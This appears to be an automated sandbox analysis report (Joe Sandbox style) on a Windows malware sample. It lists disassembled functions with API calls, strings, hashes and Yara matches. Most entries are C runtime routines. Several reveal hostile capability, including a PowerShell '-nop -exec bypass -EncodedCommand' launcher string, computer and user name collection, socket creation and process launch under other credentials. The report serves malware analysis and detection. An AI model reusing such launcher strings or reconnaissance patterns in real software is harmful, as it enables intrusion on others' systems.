                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C702B
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C7077
                • _lseeki64_nolock.LIBCMT ref: 001C7090
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                • Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
                • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                • Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21
                Function 001C6E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C6EBB
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C6EB3
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C6EFF
                • _lseek_nolock.LIBCMT ref: 001C6F18
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                • Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
                • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                • Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724
                Function 00687A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 00687ABB
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00687AB3
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00687AFF
                • _lseek_nolock.LIBCMT ref: 00687B18
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                • Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
                • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                • Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719
                Function 00687C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 00687C33
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00687C2B
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00687C77
                • _lseeki64_nolock.LIBCMT ref: 00687C90
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                • Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
                • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                • Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729
                Function 001BF36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno
                • String ID:
                • API String ID: 2288870239-0
                • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                • Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
                • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                • Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351
                Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                Download Yara Rule
                APIs
                Strings
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                • Address %p has no image-section, xrefs: 00401DC0
                • Mingw-w64 runtime failure:, xrefs: 00401D88
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                Function 001C5834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C585F
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C5857
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C58A3
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                • Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
                • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                • Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720
                Function 00686434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0068645F
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00686457
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 006864A3
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                • Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
                • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                • Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729
                Function 0068A73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2289611984-0
                • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                • Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
                • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                • Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A
                Function 001C5058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C5079
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C5071
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C50BD
                • _close_nolock.LIBCMT ref: 001C50D0
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                • Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
                • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                • Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750
                Function 00685C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 00685C79
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00685C71
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00685CBD
                • _close_nolock.LIBCMT ref: 00685CD0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                • Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
                • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                • Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19
                Function 001A3A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001A3AA9
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A3AB3
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • malloc.LIBCMT ref: 001A3ABE
                • free.LIBCMT ref: 001A3C7E
                • free.LIBCMT ref: 001A3C86
                • free.LIBCMT ref: 001A3C8E
                  • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
                  • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
                  • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
                  • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34
                • free.LIBCMT ref: 001A3C9A
                • free.LIBCMT ref: 001A3CA7
                • free.LIBCMT ref: 001A3CB4
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh
                • String ID:
                • API String ID: 4160633307-0
                • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                • Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
                • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                • Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00
                Function 0066460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 006646A9
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 006646B3
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • malloc.LIBCMT ref: 006646BE
                • free.LIBCMT ref: 0066487E
                • free.LIBCMT ref: 00664886
                • free.LIBCMT ref: 0066488E
                  • Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
                  • Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
                  • Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
                  • Part of subcall function 006654F0: free.LIBCMT ref: 00665634
                • free.LIBCMT ref: 0066489A
                • free.LIBCMT ref: 006648A7
                • free.LIBCMT ref: 006648B4
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh$AllocHeap
                • String ID:
                • API String ID: 3534990644-0
                • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                • Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
                • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                • Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04
                Function 001ABE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                • malloc.LIBCMT ref: 001ABF3B
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
                  • Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
                  • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
                  • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711
                  • Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE
                  • Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8
                  • Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07
                • malloc.LIBCMT ref: 001AC04A
                • _snprintf.LIBCMT ref: 001AC0C1
                • _snprintf.LIBCMT ref: 001AC0E7
                • _snprintf.LIBCMT ref: 001AC10E
                • free.LIBCMT ref: 001AC2C6
                  • Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
                  • Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                • String ID: /'); %s
                • API String ID: 1314452303-1283008465
                • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                • Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
                • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                • Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741
                Function 0067B47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • malloc.LIBCMT ref: 0067B528
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                • GetComputerNameExA.KERNEL32 ref: 0067B5EA
                • GetComputerNameA.KERNEL32 ref: 0067B61F
                • GetUserNameA.ADVAPI32 ref: 0067B654
                  • Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042
                • malloc.LIBCMT ref: 0067B76D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                • String ID: VUUU
                • API String ID: 632458648-2040033107
                • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                • Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
                • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                • Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704
                Function 001AE004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf
                • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                • API String ID: 3512837008-1250630670
                • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                • Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
                • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                • Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700
                Function 00671478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • GetStartupInfoA.KERNEL32 ref: 00671540
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                • GetCurrentDirectoryW.KERNEL32 ref: 006715CD
                • GetCurrentDirectoryW.KERNEL32 ref: 006715DC
                • CreateProcessWithLogonW.ADVAPI32 ref: 00671637
                • GetLastError.KERNEL32 ref: 00671641
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                • String ID: %s as %s\%s: %d
                • API String ID: 3435635427-816037529
                • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                • Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
                • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                • Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44
                Function 001B0A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                  • Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
                  • Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982
                • fseek.LIBCMT ref: 001B0B30
                  • Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
                  • Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7
                • _ftelli64.LIBCMT ref: 001B0B38
                  • Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
                  • Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341
                • fseek.LIBCMT ref: 001B0B48
                  • Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5
                • malloc.LIBCMT ref: 001B0B88
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                • fclose.LIBCMT ref: 001B0C45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                • String ID: mode
                • API String ID: 1756087678-2976727214
                • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                • Instruction ID: 90d0e5ddde56df2123dc45e1f2ef815405a37f99bc65f5c34af3800dbad401eb
                • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                • Instruction Fuzzy Hash: B541D82631468082DB14EB12E8557AE7752F7EDBD0F808226EE5E47B96DF3CC506CB40
                Function 001B8620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001B864F
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • _snprintf.LIBCMT ref: 001B8667
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • free.LIBCMT ref: 001B867E
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                • malloc.LIBCMT ref: 001B86CE
                • _snprintf.LIBCMT ref: 001B86E6
                • free.LIBCMT ref: 001B870E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                • String ID: /'); %s
                • API String ID: 761449704-1283008465
                • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                • Instruction ID: 53664babb93e745c368a5b9844ddd80b759a732194ffa29d953fd55d02d63f9f
                • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                • Instruction Fuzzy Hash: 193135213006C125DA199FA36C143E9BB66B79AFE4F984112DEE507BA6CF3CC443C300
